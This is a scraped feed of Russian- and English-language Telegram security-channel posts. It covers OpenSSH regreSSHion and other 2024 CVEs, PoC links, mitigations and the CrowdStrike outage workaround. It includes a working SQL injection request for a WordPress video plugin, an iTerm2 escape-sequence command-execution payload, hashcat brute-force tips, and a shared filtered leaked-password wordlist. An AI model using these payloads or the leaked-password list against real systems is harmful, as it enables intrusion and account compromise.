Forwarded from Ralf Hacker Channel (Ralf Hacker)
Forwarded from APT
The Qualys Threat Research Unit has discovered a Remote Unauthenticated Code Execution vulnerability in OpenSSH’s server (sshd) in glibc-based Linux systems. CVE assigned to this vulnerability is CVE-2024-6387.
The vulnerability, which is a signal handler race condition in OpenSSH’s server (sshd), allows unauthenticated remote code execution (RCE) as root on glibc-based Linux systems.
🔗 Research:
https://blog.qualys.com/vulnerabilities-threat-research/2024/07/01/regresshion-remote-unauthenticated-code-execution-vulnerability-in-openssh-server
🔗 PoC:
https://github.com/7etsuo/cve-2024-6387-poc
#openssh #glibc #rce #cve
Please open Telegram to view this post
VIEW IN TELEGRAM
SecuriXy.kz
cve-2024-6387-poc.zip
21.1 KB
Affected Versions: OpenSSH 8.5p1 to 9.8p1
Update PoC link: https://github.com/cleverg0d/cve-2024-6387-poc
Update PoC link: https://github.com/cleverg0d/cve-2024-6387-poc
SecuriXy.kz
cve-2024-6387-poc.zip
Вот и чекер на питоне подоспел по CVE-2024-6387 (OpenSSH regreSSHion)
https://github.com/xaitax/CVE-2024-6387_Check
https://github.com/xaitax/CVE-2024-6387_Check
Forwarded from club1337
YARA rule to detect every release of Brute Ratel ranging from version 1.3.x to 1.6.x.
https://github.com/paranoidninja/Brute-Ratel-C4-Community-Kit/blob/main/deprecated/brc4_1.3-1.6.yara
⚜️ @club1337
GitHub
Brute-Ratel-C4-Community-Kit/deprecated/brc4_1.3-1.6.yara at main · paranoidninja/Brute-Ratel-C4-Community-Kit
This repository contains scripts, configurations and deprecated payload loaders for Brute Ratel C4 (https://bruteratel.com/) - paranoidninja/Brute-Ratel-C4-Community-Kit
Для быстрого поиска альясом субиков домена через crt.sh добавляйте альяс в ~/.zshrc
Потом обновите сорсы
Ну и используйте
crtsh() {
if [ -z "$1" ]; then
echo "Usage: crtsh <domain>"
return 1
fi
curl -s "https://crt.sh/?q=$1&output=json" --compressed -H 'User-Agent: Mozilla/5.0' | jq -r '.[].common_name,.[].name_value' | sort -u
}
Потом обновите сорсы
source ~/.zshrc
Ну и используйте
crtsh DOMAIN.COM
SecuriXy.kz
Onother one #CVE-2024-6409: Affects the privilege separation child process with limited privileges, which affects OpenSSH in versions 8.7 and 8.8.
Состояние гонки в функции grace_alarm_handler() создает возможность удаленного выполнения кода в дочернем процессе privsep. Новая уязвимость имеет меньшее непосредственное влияние, но по-прежнему представляет собой значительный риск для безопасности.
Patch Now:
В
Ребутните sshd
Этот костыль эффективен для устранения обеих уязвимостей CVE-2024-6387 и CVE-2024-6409...
Состояние гонки в функции grace_alarm_handler() создает возможность удаленного выполнения кода в дочернем процессе privsep. Новая уязвимость имеет меньшее непосредственное влияние, но по-прежнему представляет собой значительный риск для безопасности.
Patch Now:
В
/etc/ssh/sshd_config
, задайте:
LoginGraceTime 0
Ребутните sshd
systemctl restart sshd
Этот костыль эффективен для устранения обеих уязвимостей CVE-2024-6387 и CVE-2024-6409...
rockyou2024_printable_8-40.7z.002
3.7 GB
https://cybernews.com/security/rockyou2024-largest-password-compilation-leak/
Мы его скачали, немного отфильтровали, а теперь делимся с Вами результатами
ZIP-архив в 45 гигов в распакованном виде выдаёт текстовый файл размером 155 ГБ.
При открытии с помощью
less
будет уведомление, что он выглядит как бинарный файл. В нём по какой-то причине добавлено приличное количество мусора...Вычистив его, получаем на выходе файл размером в 144 ГБ. Но даже в нём, достаточно бесполезных строк (Хотя если кому надо, можем выложить и его).
Отфильтровали ещё немного, оставив только строки без пробелов длиной от 8 до 40 символов и вуаля - 25 гигабайт приемлемого вордлиста).
Пользуйтесь
Количество строк: 1 710 971 198
SHA256:
rockyou2024_printable_8-40.7z.001
B6F5B59C4FAE396BE756942F598C3DC214E1BCCBCD7EC9C8D6A8863B64A96879
rockyou2024_printable_8-40.7z.002
DEA89C6F60959BE704778A441DD0F9680161B28BB3F4C51E825E06AAA2B37176
#wordlist #rockyou #rockyou2024 #parsed_rockyou #rockyou2024_printable_8_40 #passwords
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from APT
This media is not supported in your browser
VIEW IN TELEGRAM
PoC for:
— CVE-2024-38094
— CVE-2024-38024
— CVE-2024-38023
🔗 Source:
https://github.com/testanull/MS-SharePoint-July-Patch-RCE-PoC
#sharepoint #poc #rce #cve
Please open Telegram to view this post
VIEW IN TELEGRAM
#Malwoverview - удобная тулина первого реагирования для поиска угроз, которая выполняет первоначальную и быструю сортировку образцов вредоносного ПО, URL-адресов, IP-адресов, доменов, семейств вредоносных программ, IOC и хэшей. Кроме того, Malwoverview может получать динамические и статические отчеты о поведении, отправлять и загружать образцы с нескольких конечных точек. Одним словом, он работает как клиент для основных существующих песочниц.
Установка и настройка конфига описаны в гите.
https://github.com/alexandreborges/malwoverview?tab=readme-ov-file
Установка и настройка конфига описаны в гите.
https://github.com/alexandreborges/malwoverview?tab=readme-ov-file
#CVE-2024-21007 Weblogic Server RCE & #CVE-2024-21006 unauthorized access to critical data
├ Published: 2024-04-16
├ Base Score: 7.5 (HIGH)
├ Affected Versions: 12.2.1.4.0, 14.1.1.0.0
https://www.oracle.com/security-alerts/cpuapr2024.html
https://securityboulevard.com/2024/04/weblogic-t3-iiop-information-disclosure-vulnerability-cve-2024-21006-cve-2024-21007/?utm_source=dlvr.it&utm_medium=twitter
├ Published: 2024-04-16
├ Base Score: 7.5 (HIGH)
├ Affected Versions: 12.2.1.4.0, 14.1.1.0.0
https://www.oracle.com/security-alerts/cpuapr2024.html
https://securityboulevard.com/2024/04/weblogic-t3-iiop-information-disclosure-vulnerability-cve-2024-21006-cve-2024-21007/?utm_source=dlvr.it&utm_medium=twitter
#Wordlist test
Ребята проделали огромную работу по проверке качества словарей и рулов для #hashcat и представили публичную табличку с результатами и КПД. Рулы для брута в комбинации с нагенеренными пасами под конкретную компанию дают феноменальные результаты. Даже старый добрый rockyou дает к примеру с рулом buka_400k огромный плюс.
Тестите, ставьте лайки 😉
https://docs.google.com/spreadsheets/d/1qQNwggWIWtL-m0EYrRg_vdwHOrZCY-SnWcYTwQN0fMk/edit?pli=1&gid=524870023#gid=524870023
https://docs.google.com/spreadsheets/d/1qQNwggWIWtL-m0EYrRg_vdwHOrZCY-SnWcYTwQN0fMk/edit?pli=1&gid=1952927995#gid=1952927995
Чуть позже накидаем сюда https://www.clevergod.net/HashCat-a9f4bde5dc764558858b921b9fd228a6 подробно как генерить словари, как юзать хэшкат и использовать рулы к словарям.
Ребята проделали огромную работу по проверке качества словарей и рулов для #hashcat и представили публичную табличку с результатами и КПД. Рулы для брута в комбинации с нагенеренными пасами под конкретную компанию дают феноменальные результаты. Даже старый добрый rockyou дает к примеру с рулом buka_400k огромный плюс.
Тестите, ставьте лайки 😉
https://docs.google.com/spreadsheets/d/1qQNwggWIWtL-m0EYrRg_vdwHOrZCY-SnWcYTwQN0fMk/edit?pli=1&gid=524870023#gid=524870023
https://docs.google.com/spreadsheets/d/1qQNwggWIWtL-m0EYrRg_vdwHOrZCY-SnWcYTwQN0fMk/edit?pli=1&gid=1952927995#gid=1952927995
Чуть позже накидаем сюда https://www.clevergod.net/HashCat-a9f4bde5dc764558858b921b9fd228a6 подробно как генерить словари, как юзать хэшкат и использовать рулы к словарям.
Forwarded from Proxy Bar
This media is not supported in your browser
VIEW IN TELEGRAM
Просыпаемся, завтракаем
*
CVE-2024-5522 WordPress HTML5 Video Player
*
usage:
*
CVE-2024-5522 WordPress HTML5 Video Player
SQLi
*
usage:
GET /wp-json/h5vp/v1/video/0?id='+union all select concat(0x64617461626173653a,1,0x7c76657273696f6e3a,2,0x7c757365723a,md5({{num}})),2,3,4,5,6,7,8-- -
This media is not supported in your browser
VIEW IN TELEGRAM
PoC: #CVE-2024-38396 & #CVE-2024-38395 for iTerm2 arbitrary command execution
Вы можете выполнять произвольные команды, просто управляя данными, выводимыми в консоль. Вводимые в консоль команды работают в обновленной на текущий момент версии Build 3.5.3.
Вы можете выполнять произвольные команды, просто управляя данными, выводимыми в консоль. Вводимые в консоль команды работают в обновленной на текущий момент версии Build 3.5.3.
]2;s&open -aCalculator&[21t P1000p%session-changed s
Массовый сбой в #Windows на ПК и серверах после обновления сенсоров #CrowdStrike. Оригинал уведомления от CrowdStrike: "Hello everyone - We have widespread reports of BSODs on windows hosts, occurring on multiple sensor versions. Investigating cause. TA will be published shortly. Pinned thread. SCOPE: EU-1, US-1, US-2 and US-GOV-1".
Workaround Steps:
https://habr.com/ru/news/829912/
https://www.theverge.com/2024/7/19/24201717/windows-bsod-crowdstrike-outage-issue
Workaround Steps:
1. Boot Windows into Safe Mode or the Windows Recovery Environment
2. Navigate to the C:\Windows\System32\drivers\CrowdStrike directory
3. Locate the file matching “C-00000291*.sys”, and delete it.
4. Boot the host normally.
https://habr.com/ru/news/829912/
https://www.theverge.com/2024/7/19/24201717/windows-bsod-crowdstrike-outage-issue
Хабр
Сбой в Windows на ПК и серверах после обновления CrowdStrike затронул IT-инфраструктуру компаний, банков и аэропортов
18 и 19 июля 2024 года системные администраторы и корпоративные пользователи столкнулись с нерабочими ПК и серверами на Windows, на которых начал возникать синий экран смерти (BSOD) и они начали...